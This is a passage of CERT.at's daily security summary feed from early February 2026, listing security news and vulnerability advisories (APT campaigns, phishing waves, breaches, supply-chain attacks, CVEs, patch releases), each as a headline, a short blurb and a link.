In January 2026, Zscaler ThreatLabz identified a new campaign in-the-wild, tracked as Operation Neusploit, targeting countries in the Central and Eastern European region. In this campaign, the threat actor leveraged specially crafted Microsoft RTF files to exploit CVE-2026-21509 and deliver malicious backdoors in a multi-stage infection chain.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit&quot;&gt;https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New round for the perennial scam: phishing SMS in the name of FinanzOnline&lt;/h3&gt;

The scam never really came to a standstill, but a wave of particular magnitude is currently being observed. It concerns the by now almost classic phishing SMS in the name of FinanzOnline, warning that the recipient's registration is about to expire. In reality, criminals are after their victims' contact and bank details.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/phishing-sms-finanzonline/&quot;&gt;https://www.watchlist-internet.at/news/phishing-sms-finanzonline/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;WhatsApp Encryption, a Lawsuit, and a Lot of Noise&lt;/h3&gt;

It's not every day that we see mainstream media get excited about encryption apps! For that reason, the past several days have been fascinating, since we've been given not one but several unusual stories about the encryption used in WhatsApp.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.cryptographyengineering.com/2026/02/02/whatsapp-encryption-a-lawsuit-and-a-lot-of-noise/&quot;&gt;https://blog.cryptographyengineering.com/2026/02/02/whatsapp-encryption-a-lawsuit-and-a-lot-of-noise/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The art of the invisible key: Passkey global breakthrough&lt;/h3&gt;

Passkeys now protect billions of accounts, redefining how the world signs in through stronger, more secure authentication without a password. Yet this global movement runs deeper.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cyberark.com/resources/threat-research-blog/the-art-of-the-invisible-key-passkey-global-breakthrough&quot;&gt;https://www.cyberark.com/resources/threat-research-blog/the-art-of-the-invisible-key-passkey-global-breakthrough&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The Chrysalis Backdoor: A Deep Dive into Lotus Blossom's toolkit&lt;/h3&gt;

Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central America, focusing on government, telecom, aviation, critical infrastructure, and media sectors.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/&quot;&gt;https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security update: unauthorised access to WatchGuard Firebox conceivable&lt;/h3&gt;

Attackers can gain access to WatchGuard's Firebox firewalls. Repaired Fireware OS versions are available for download.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Sicherheitsupdate-Unbefugte-Zugriffe-auf-WatchGuard-Firebox-vorstellbar-11163128.html&quot;&gt;https://www.heise.de/news/Sicherheitsupdate-Unbefugte-Zugriffe-auf-WatchGuard-Firebox-vorstellbar-11163128.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical vLLM Flaw Exposes Millions of AI Servers to Remote Code Execution&lt;/h3&gt;

A newly disclosed security flaw has placed millions of AI servers at risk after researchers identified a critical vulnerability in vLLM, a widely deployed Python package for serving large language models. The issue, tracked as CVE-2026-22778 (GHSA-4r2x-xpjr-7cvv), enables remote code execution (RCE) by submitting a malicious video URL to a vulnerable vLLM API endpoint. The vulnerability affects vLLM versions 0.8.3 through 0.14.0 and was patched in version 0.14.1.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/cve-2026-22778-vllm-rce-malicious-video-link/&quot;&gt;https://thecyberexpress.com/cve-2026-22778-vllm-rce-malicious-video-link/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ZDI-26-043: (0Day) npm cli Uncontrolled Search Path Element Local Privilege Escalation Vulnerability&lt;/h3&gt;

This vulnerability allows local attackers to escalate privileges on affected installations of npm cli. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2026-0775.
&lt;p /&gt;
&lt;A HREF=&quot;http://www.zerodayinitiative.com/advisories/ZDI-26-043/&quot;&gt;http://www.zerodayinitiative.com/advisories/ZDI-26-043/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Micropatches released for Microsoft Excel Remote Code Execution Vulnerability (CVE-2025-62203)&lt;/h3&gt;

November 2025 Windows Updates brought a patch for CVE-2025-62203, a remote code execution vulnerability in Microsoft Excel that could allow a remote attacker to have their malicious code executed on a user's computer upon opening an Excel file. The vulnerability was discovered and reported to Microsoft by Quan Jin with DBAPPSecurity.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.0patch.com/2026/02/micropatches-released-for-microsoft.html&quot;&gt;https://blog.0patch.com/2026/02/micropatches-released-for-microsoft.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Tuesday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (fence-agents, gcc-toolset-15-binutils, golang-github-openprinting-ipp-usb, iperf3, kernel, kernel-rt, openssl, osbuild-composer, php:8.2, python3, util-linux, and wireshark), Debian (clamav and xrdp), Fedora (gimp and openttd), Mageia (docker-containerd), Oracle (gimp:2.8, golang-github-openprinting-ipp-usb, grafana-pcp, image-builder, iperf3, kernel, openssl, osbuild-composer, php, php:8.2, php:8.3, python3.9, util-linux, and wireshark), SUSE (cockpit-subscriptions, elemental-register, elemental-toolkit, glibc, gpg2, logback, openssl-1_1, python-urllib3, ucode-amd, and unbound), and Ubuntu (inetutils, libpng1.6, mysql-8.0, mysql-8.4, openjdk-17, openjdk-17-crac, openjdk-21, openjdk-21-crac, openjdk-25, openjdk-25-crac, openjdk-8, openjdk-lts, and thunderbird).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1057047/&quot;&gt;https://lwn.net/Articles/1057047/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Update now! Attackers take over SmarterMail instances as admin&lt;/h3&gt;

All three security vulnerabilities now closed in SmarterMail 100.0.9511 (CVE-2026-23760, CVE-2026-24423, CVE-2025-52691) are rated with the threat level &quot;critical&quot;. All previous releases are said to be vulnerable. According to the US security agency CISA, attackers are already exploiting the first two vulnerabilities.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11163471&quot;&gt;https://heise.de/-11163471&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Improper file access permission settings in Mitsubishi Small-Capacity UPS Shutdown Software FREQSHIP-mini for Windows&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN64883963/&quot;&gt;https://jvn.jp/en/jp/JVN64883963/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Kubernetes CVE-2026-24514: ingress-nginx Admission Controller denial of service&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://github.com/kubernetes/kubernetes/issues/136680&quot;&gt;https://github.com/kubernetes/kubernetes/issues/136680&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Kubernetes CVE-2026-24513: ingress-nginx auth-url protection bypass&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://github.com/kubernetes/kubernetes/issues/136679&quot;&gt;https://github.com/kubernetes/kubernetes/issues/136679&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Kubernetes CVE-2026-24512: ingress-nginx rules.http.paths.path nginx configuration injection&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://github.com/kubernetes/kubernetes/issues/136678&quot;&gt;https://github.com/kubernetes/kubernetes/issues/136678&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Kubernetes CVE-2026-1580: ingress-nginx auth-method nginx configuration injection&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://github.com/kubernetes/kubernetes/issues/136677&quot;&gt;https://github.com/kubernetes/kubernetes/issues/136677&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-03T19:23:28Z</dc:date></entry><entry><title>Daily summary - 02.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-02022026"/><author><name>CERT.at</name></author><updated>2026-02-02T19:51:16Z</updated><published>2026-02-02T19:51:16Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 30-01-2026 18:00 - Monday 02-02-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  Alexander Riepl


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Cloud storage payment scam floods inboxes with fake renewals&lt;/h3&gt;

Over the past few months, a large-scale cloud storage subscription scam campaign has been targeting users worldwide with repeated emails falsely warning recipients that their photos, files, and accounts are about to be blocked or deleted due to an alleged payment failure.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/cloud-storage-payment-scam-floods-inboxes-with-fake-renewals/&quot;&gt;https://www.bleepingcomputer.com/news/security/cloud-storage-payment-scam-floods-inboxes-with-fake-renewals/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;NationStates confirms data breach, shuts down game site&lt;/h3&gt;

NationStates, a multiplayer browser-based game, has confirmed a data breach after taking its website offline earlier this week to investigate a security incident.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/nationstates-confirms-data-breach-shuts-down-game-site/&quot;&gt;https://www.bleepingcomputer.com/news/security/nationstates-confirms-data-breach-shuts-down-game-site/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Panera Bread breach impacts 5.1 million accounts, not 14 million customers&lt;/h3&gt;

The data breach notification service Have I Been Pwned says that a data breach at the U.S. food chain Panera Bread affected 5.1 million accounts, not 14 million customers as previously reported.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/panera-bread-data-breach-impacts-51-million-accounts-not-14-million-customers/&quot;&gt;https://www.bleepingcomputer.com/news/security/panera-bread-data-breach-impacts-51-million-accounts-not-14-million-customers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Espionage risk: Verfassungsschutz warns of electric cars from China&lt;/h3&gt;

Electric cars from China could theoretically be controlled remotely. The technical risks are documented - but Tesla also collects data on a massive scale.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/spionagegefahr-verfassungsschutz-warnt-vor-e-autos-aus-china-2602-204851.html&quot;&gt;https://www.golem.de/news/spionagegefahr-verfassungsschutz-warnt-vor-e-autos-aus-china-2602-204851.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Text editor: Notepad++ server hacked and update traffic manipulated&lt;/h3&gt;

Attackers succeeded in compromising the Notepad++ update infrastructure and redirecting traffic. The developer apologises.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/texteditor-notepad-server-gehackt-und-update-traffic-manipuliert-2602-204876.html&quot;&gt;https://www.golem.de/news/texteditor-notepad-server-gehackt-und-update-traffic-manipuliert-2602-204876.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Breaking the Sound Barrier, Part II: Exploiting CVE-2024-54529&lt;/h3&gt;

In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-54529) and a double-free vulnerability (CVE-2025-31235) in the coreaudiod system daemon through a process I call knowledge-driven fuzzing. While the first post focused on the process of finding the vulnerabilities, this post dives into the intricate process of exploiting the type confusion vulnerability.
&lt;p /&gt;
&lt;A HREF=&quot;https://projectzero.google/2026/01/sound-barrier-2.html&quot;&gt;https://projectzero.google/2026/01/sound-barrier-2.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Google Presentations Abused for Phishing&lt;/h3&gt;

Charlie, one of our readers, has forwarded an interesting phishing email. The email was sent to users of the Vivaldi Webmail service.
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32668&quot;&gt;https://isc.sans.edu/diary/rss/32668&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AI Coding Assistants Secretly Copying All Code to China&lt;/h3&gt;

There's a new report about two AI coding assistants, used by 1.5 million developers, that are surreptitiously sending a copy of everything they ingest to China. Maybe avoid using them.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.schneier.com/blog/archives/2026/02/ai-coding-assistants-secretly-copying-all-code-to-china.html&quot;&gt;https://www.schneier.com/blog/archives/2026/02/ai-coding-assistants-secretly-copying-all-code-to-china.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Shadow Directories: A Unique Method to Hijack WordPress Permalinks&lt;/h3&gt;

Last month, while working on a WordPress cleanup case, a customer reached out with a strange complaint: their website looked completely normal to them and their visitors, but Google search results were showing something very different. Instead of normal titles and descriptions, Google was displaying casino and gambling-related content. We have been seeing rising cases of spam on WordPress websites. What made this even more confusing was where the spam was appearing.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.sucuri.net/2026/01/shadow-directories-a-unique-method-to-hijack-wordpress-permalinks.html&quot;&gt;https://blog.sucuri.net/2026/01/shadow-directories-a-unique-method-to-hijack-wordpress-permalinks.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ex-Google Engineer Convicted for Stealing AI Secrets for China Startup&lt;/h3&gt;

A former Google engineer accused of stealing thousands of the company's confidential documents to build a startup in China has been convicted in the U.S., the Department of Justice (DoJ) announced Thursday.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/ex-google-engineer-convicted-for.html&quot;&gt;https://thehackernews.com/2026/01/ex-google-engineer-convicted-for.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Open VSX Supply Chain Attack Used Compromised Dev Account to Spread GlassWorm&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a supply chain attack targeting the Open VSX Registry in which unidentified threat actors compromised a legitimate developer's resources to push malicious updates to downstream users.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/open-vsx-supply-chain-attack-used.html&quot;&gt;https://thehackernews.com/2026/02/open-vsx-supply-chain-attack-used.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;eScan Antivirus Update Servers Compromised to Deliver Multi-Stage Malware&lt;/h3&gt;

The update infrastructure for eScan antivirus, a security solution developed by Indian cybersecurity company MicroWorld Technologies, has been compromised by unknown attackers to deliver a persistent downloader to enterprise and consumer systems.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/escan-antivirus-update-servers.html&quot;&gt;https://thehackernews.com/2026/02/escan-antivirus-update-servers.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security vulnerability: replacement of further electronic health professional cards under way&lt;/h3&gt;

Customers of D-Trust and SHC+Care must replace their already ECC-capable electronic health professional cards (eHBA). How many are affected is unclear.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Digital-Health-Tausch-weiterer-E-Heilberufsausweise-wegen-Sicherheitsluecke-11161151.html&quot;&gt;https://www.heise.de/news/Digital-Health-Tausch-weiterer-E-Heilberufsausweise-wegen-Sicherheitsluecke-11161151.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Anonymising Linux: emergency update Tails 7.4.1 released&lt;/h3&gt;

The anonymity-focused Linux distribution Tails has been released in version 7.4.1 - an emergency update.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Anonymisierendes-Linux-Notfall-Update-Tails-7-4-1-erschienen-11162314.html&quot;&gt;https://www.heise.de/news/Anonymisierendes-Linux-Notfall-Update-Tails-7-4-1-erschienen-11162314.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Please Don't Feed the Scattered Lapsus Shiny Hunters&lt;/h3&gt;

A prolific data ransom gang that calls itself Scattered Lapsus ShinyHunters (SLSH) has a distinctive playbook when it seeks to extort payment from victim firms: Harassing, threatening and even swatting executives and their families, all while notifying journalists and regulators about the extent of the intrusion.
&lt;p /&gt;
&lt;A HREF=&quot;https://krebsonsecurity.com/2026/02/please-dont-feed-the-scattered-lapsus-shiny-hunters/&quot;&gt;https://krebsonsecurity.com/2026/02/please-dont-feed-the-scattered-lapsus-shiny-hunters/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How fake party invitations are being used to install remote access tools&lt;/h3&gt;

'You're invited!' It sounds friendly, familiar and quite harmless. But in a scam we recently spotted, that simple phrase is being used to trick victims into installing a full remote access tool on their Windows computers, giving attackers complete control of the system.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.malwarebytes.com/blog/threat-intel/2026/02/how-fake-party-invitations-are-being-used-to-install-remote-access-tools&quot;&gt;https://www.malwarebytes.com/blog/threat-intel/2026/02/how-fake-party-invitations-are-being-used-to-install-remote-access-tools&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft declares NTLM &quot;deprecated&quot; - to be disabled in the next Windows version&lt;/h3&gt;

Microsoft has declared the outdated NTLM authentication in Windows &quot;deprecated&quot;. In the next Windows version (Server and Client), NTLM will be disabled by default and Kerberos authentication becomes the standard. With that, the use of NTLM is drawing to a close.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/02/01/microsoft-erklaert-ntlm-als-deprecated-deaktivierung-in-naechster-server-version/&quot;&gt;https://borncity.com/blog/2026/02/01/microsoft-erklaert-ntlm-als-deprecated-deaktivierung-in-naechster-server-version/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;US Seizes $400 Million Linked to Helix Dark Web Crypto Mixer&lt;/h3&gt;

US authorities take control of over $400 million in crypto, cash, and property tied to Helix, a major darknet bitcoin mixing service used by drug markets.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/us-seizes-400m-helix-dark-web-crypto-mixer/&quot;&gt;https://hackread.com/us-seizes-400m-helix-dark-web-crypto-mixer/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Windows Malware Uses Pulsar RAT for Live Chats While Stealing Data&lt;/h3&gt;

We usually think of computer viruses as silent, invisible programs running in the background, but a worrying discovery shows that modern hackers are getting much more personal.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/windows-malware-pulsar-rat-live-chats-steal-data/&quot;&gt;https://hackread.com/windows-malware-pulsar-rat-live-chats-steal-data/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Guidance from the Frontlines: Proactive Defense Against ShinyHunters-Branded Data Theft Targeting SaaS&lt;/h3&gt;

Mandiant is tracking a significant expansion and escalation in the operations of threat clusters associated with ShinyHunters-branded extortion. As detailed in our companion report, 'Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft', these campaigns leverage evolved voice phishing (vishing) and victim-branded credential harvesting to successfully compromise single sign-on (SSO) credentials and enroll unauthorized devices into victim multi-factor authentication (MFA) solutions.
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft&lt;/h3&gt;

Mandiant has identified an expansion in threat activity that uses tactics, techniques, and procedures (TTPs) consistent with prior ShinyHunters-branded extortion operations. These operations primarily leverage sophisticated voice phishing (vishing) and victim-branded credential harvesting sites to gain initial access to corporate environments by obtaining single sign-on (SSO) credentials and multi-factor authentication (MFA) codes.
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Manic Monday: A Day in the Life of Threat Hunting&lt;/h3&gt;

Discover a day in the life of threat hunting with Bitsight Adversary Intelligence. Learn how security teams detect and disrupt threats before damage is done.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bitsight.com/blog/day-in-the-life-threat-hunting&quot;&gt;https://www.bitsight.com/blog/day-in-the-life-threat-hunting&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Someone Knows Bash Far Too Well, And We Love It (Ivanti EPMM Pre-Auth RCEs CVE-2026-1281 &amp; CVE-2026-1340)&lt;/h3&gt;

When Ivanti removed the embargoes from CVE-2026-1281 and CVE-2026-1340 - actively exploited pre-auth Remote Command Execution vulnerabilities in Ivanti's Endpoint Manager Mobile (EPMM) solution - we sighed with relief. Clearly, the universe had decided to continue mocking Secure-By-Design signers right on schedule - every January.
&lt;p /&gt;
&lt;A HREF=&quot;https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/&quot;&gt;https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The European Space Agency got hacked, and now we own the domain used!&lt;/h3&gt;

It's not often that two of my interests align so well, but we're talking about space rockets and cyber security! Whilst Magecart and Magecart-style attacks might not be the most common attack vector at the moment, they are still happening with worrying frequency, and they are still catching out some pretty big organisations.
&lt;p /&gt;
&lt;A HREF=&quot;https://scotthelme.ghost.io/the-european-space-agency-got-hacked-and-now-we-own-the-domain-used/&quot;&gt;https://scotthelme.ghost.io/the-european-space-agency-got-hacked-and-now-we-own-the-domain-used/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;archive.today is directing a DDOS attack against my blog&lt;/h3&gt;

Around January 11, 2026, archive.today (aka archive.is, archive.md, etc) started using its users as proxies to conduct a distributed denial of service (DDOS) attack against Gyrovague, my personal blog. 
&lt;p /&gt;
&lt;A HREF=&quot;https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/&quot;&gt;https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Exploiting MediaTek's Download Agent&lt;/h3&gt;

In September 2025, Chimera quietly announced 'world-first' support for MediaTek's latest Dimensity 9400 and 8400 SoCs running DAs compiled months after MediaTek had patched Carbonara. So we figured they'd either found a way around the patches, or they were sitting on something entirely new. We had to find out.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/&quot;&gt;https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hacking Moltbook: The AI Social Network Any Human Can Control&lt;/h3&gt;

1 exposed database. 35,000 emails. 1.5M API keys. And 17,000 humans behind the not-so-autonomous AI network.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.wiz.io/blog/exposed-moltbook-database-reveals-millions-of-api-keys&quot;&gt;https://www.wiz.io/blog/exposed-moltbook-database-reveals-millions-of-api-keys&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Inside Lodash's Security Reset and Maintenance Reboot&lt;/h3&gt;

For more than a decade, Lodash has been one of the most widely deployed libraries in the JavaScript ecosystem. Its utilities are deeply embedded in frameworks, build systems, and production applications across the web. Like many foundational dependencies, Lodash evolved into critical infrastructure long before the ecosystem had strong models for funding, governance, or long-term security operations.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/inside-lodash-security-reset?utm_medium=feed&quot;&gt;https://socket.dev/blog/inside-lodash-security-reset?utm_medium=feed&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Britain and Japan Join Forces on Cybersecurity and Strategic Minerals&lt;/h3&gt;

Japan and Britain have agreed to expand cooperation on cybersecurity and critical mineral supply chains, framing the move as a strategic response to intensifying geopolitical, economic, and technological pressures. The British and Japanese cybersecurity strategy and agreement were confirmed during British Prime Minister Keir Starmer's overnight visit to Tokyo, where leaders from both countries reaffirmed their commitment to collective security and economic resilience.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/britain-japanese-cybersecurity-cooperation/&quot;&gt;https://thecyberexpress.com/britain-japanese-cybersecurity-cooperation/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russian APT28 Exploit Zero-Day Hours After Microsoft Discloses Office Vulnerability&lt;/h3&gt;

Ukraine's cyber defenders warn Russian hackers weaponized a Microsoft zero-day within 24 hours of public disclosure, targeting government agencies with malicious documents delivering Covenant framework backdoors.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/russian-apt28-exploit-zero-day-cve-2026-21509/&quot;&gt;https://thecyberexpress.com/russian-apt28-exploit-zero-day-cve-2026-21509/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Default Credentials, Vulnerable Devices Exploited in Polish Energy Grid Attack&lt;/h3&gt;

A cyberattack by Russian state-sponsored threat actors that targeted at least 30 wind and solar farms in Poland relied on default credentials, lack of multi-factor authentication (MFA) and outdated and misconfigured devices, according to a new report on the December 2025 incident by CERT Polska, the Polish computer emergency response team.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/default-credentials-polish-energy-grid-attack/&quot;&gt;https://thecyberexpress.com/default-credentials-polish-energy-grid-attack/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;OpenSSL: 12 security holes, one allows malicious code execution and is critical&lt;/h3&gt;

12 security vulnerabilities were discovered in OpenSSL - using AI tools. One of them is rated critical. Updated software is available.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/OpenSSL-12-Sicherheitslecks-eines-erlaubt-Schadcodeausfuehrung-und-ist-kritisch-11161775.html&quot;&gt;https://www.heise.de/news/OpenSSL-12-Sicherheitslecks-eines-erlaubt-Schadcodeausfuehrung-und-ist-kritisch-11161775.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security patches: root attacks on IBM Db2 possible&lt;/h3&gt;

Several security vulnerabilities put IBM's database management system Db2 at risk. Primarily, instances can crash.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Sicherheitspatches-Root-Attacken-auf-IBM-Db2-moeglich-11161723.html&quot;&gt;https://www.heise.de/news/Sicherheitspatches-Root-Attacken-auf-IBM-Db2-moeglich-11161723.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Dell Unity: attackers can execute malicious code with root privileges&lt;/h3&gt;

Admins should promptly install an important security update for Dell Unity Operating Environment.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Dell-Unity-Angreifer-koennen-Schadcode-mit-Root-Rechten-ausfuehren-11162412.html&quot;&gt;https://www.heise.de/news/Dell-Unity-Angreifer-koennen-Schadcode-mit-Root-Rechten-ausfuehren-11162412.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Monday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (iperf3, kernel, and php), Debian (ceph, pillow, pyasn1, python-django, and python-tornado), Fedora (bind9-next, cef, chromium, fontforge, java-21-openjdk, java-25-openjdk, java-latest-openjdk, mingw-python-urllib3, mingw-python-wheel, nodejs20, nodejs22, nodejs24, opencc, openssl, python-wheel, and qownnotes), Red Hat (binutils, gcc-toolset-13-binutils, gcc-toolset-14-binutils, gcc-toolset-15-binutils, java-1.8.0-openjdk, and java-25-openjdk), Slackware (expat), SUSE (bind, cacti, cacti-spine, chromedriver, chromium, dirmngr, fontforge-20251009, glib2, golang-github-prometheus-prometheus, govulncheck-vulndb, icinga2, ImageMagick, kernel, logback, openCryptoki, openssl-1_1, python311-djangorestframework, python311-pypdf, python314, python315, qemu, and xen), and Ubuntu (linux, linux-aws, linux-aws-5.4, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm and linux-aws-fips, linux-fips, linux-gcp-fips).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1056923/&quot;&gt;https://lwn.net/Articles/1056923/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Privileged File System Vulnerability Present in a SCADA System&lt;/h3&gt;

We detail our discovery of CVE-2025-0921. This privileged file system flaw in SCADA system Iconics Suite could lead to a denial-of-service (DoS) attack.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/iconics-suite-cve-2025-0921/&quot;&gt;https://unit42.paloaltonetworks.com/iconics-suite-cve-2025-0921/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Vulnerability &amp; Patch Roundup - January 2026&lt;/h3&gt;

Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners about potential threats to their environments, we've compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.sucuri.net/2026/01/vulnerability-patch-roundup-january-2026.html&quot;&gt;https://blog.sucuri.net/2026/01/vulnerability-patch-roundup-january-2026.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Multiple vulnerabilities in Cybozu Garoon&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN35265756/&quot;&gt;https://jvn.jp/en/jp/JVN35265756/&lt;/a&gt;

&lt;hr&gt;

